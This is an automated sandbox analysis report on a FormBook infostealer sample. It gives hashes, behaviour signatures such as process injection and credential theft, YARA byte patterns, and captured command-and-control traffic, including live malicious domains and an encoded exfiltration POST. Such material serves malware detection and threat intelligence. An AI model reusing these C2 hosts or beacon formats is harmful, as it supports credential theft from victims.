
Windows Analysis Report
yZcecBUXN7.exe

Overview

General Information

Sample name: yZcecBUXN7.exe (renamed because original name is a hash value)
Original sample name: 9cd48f0d93c28ae6559409de23414554.exe
Analysis ID: 1435169
MD5: 9cd48f0d93c28ae6559409de23414554
SHA1: a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
SHA256: 3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
Tags: 32exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yZcecBUXN7.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
    • yZcecBUXN7.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
      • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 3688 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netsh.exe (PID: 6760 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 916 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x90f43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x7a482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(13 entries in this table; only the first are shown in this extract)

Source | Rule | Description | Author | Strings
1.2.yZcecBUXN7.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.yZcecBUXN7.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x6be6b:$x1: In$J$ct0r
1.2.yZcecBUXN7.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.yZcecBUXN7.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cc63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x161a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(5 entries in this table; only the first are shown in this extract)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= | Avira URL Cloud: Label: malware
Source: http://www.bnbuotqakx.shop/0hhg/ | Avira URL Cloud: Label: malware
Source: http://www.dhleba51.ru/0hhg/ | Avira URL Cloud: Label: malware
Source: http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= | Avira URL Cloud: Label: malware
Source: http://www.bnbuotqakx.shop | Avira URL Cloud: Label: malware
Source: bnbuotqakx.shop | Virustotal: Detection: 5%
Source: www.vavada-band.ru | Virustotal: Detection: 6%
Source: http://www.bettaroom.ru/0hhg/ | Virustotal: Detection: 7%
Source: yZcecBUXN7.exe | ReversingLabs: Detection: 28%
Source: yZcecBUXN7.exe | Virustotal: Detection: 37%
Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: yZcecBUXN7.exe | Joe Sandbox ML: detected
Source: yZcecBUXN7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: yZcecBUXN7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdb | source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP | source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL | source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then xor eax, eax
Source: Joe Sandbox View | IP Address: 203.161.50.127
Source: Joe Sandbox View | IP Address: 195.24.68.5
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries)
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1 Host: www.vavada-band.ru Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1 Host: www.bettaroom.ru Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1 Host: www.dhleba51.ru Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1 Host: www.dainikmirpur.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1 Host: www.whirledairlines.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1 Host: www.quantummquest.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1 Host: www.yamiyasheec.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1 Host: www.applesolve.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1 Host: www.xxaiai.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1 Host: www.dk48.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1 Host: www.cucuzeus88.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: www.vavada-band.ru
Source: global traffic | DNS traffic detected: DNS query: www.bettaroom.ru
Source: global traffic | DNS traffic detected: DNS query: www.dhleba51.ru
Source: global traffic | DNS traffic detected: DNS query: www.dainikmirpur.com
Source: global traffic | DNS traffic detected: DNS query: www.whirledairlines.com
Source: global traffic | DNS traffic detected: DNS query: www.quantummquest.top
Source: global traffic | DNS traffic detected: DNS query: www.yamiyasheec.online
Source: global traffic | DNS traffic detected: DNS query: www.applesolve.com
Source: global traffic | DNS traffic detected: DNS query: www.xxaiai.top
Source: global traffic | DNS traffic detected: DNS query: www.vaesen.net
Source: global traffic | DNS traffic detected: DNS query: www.dk48.lol
Source: global traffic | DNS traffic detected: DNS query: www.cluird.cloud
Source: global traffic | DNS traffic detected: DNS query: www.cucuzeus88.store
Source: global traffic | DNS traffic detected: DNS query: www.bnbuotqakx.shop
            Source: unknownHTTP traffic detected: POST /0hhg/ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bettaroom.ruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 205Referer: http://www.bettaroom.ru/0hhg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 46 58 2f 6b 6a 36 36 75 33 50 6f 77 6d 72 36 50 37 55 49 4d 52 4b 76 2b 32 57 65 66 31 76 38 55 4b 45 75 67 48 57 66 4b 7a 64 6b 30 53 31 6f 37 32 69 75 4e 74 37 72 74 4e 35 46 6a 53 4d 78 59 6d 66 51 64 30 4a 56 7a 54 36 53 4b 70 39 36 70 35 4e 31 6e 47 75 47 73 6d 4d 6a 4a 78 74 54 59 73 6c 71 46 6d 7a 6d 37 74 57 2f 38 37 57 45 66 63 6c 51 76 37 57 77 34 66 46 6b 78 48 70 7a 4a 4c 50 32 51 68 75 79 4c 76 54 71 47 6e 48 57 66 47 6a 32 47 47 48 44 36 68 46 51 49 4b 71 54 71 33 2f 74 58 56 4f 5a 6a 61 57 48 79 69 58 73 4a 44 62 4f 6c 51 3d 3d Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:24:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 May 2024 06:25:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 
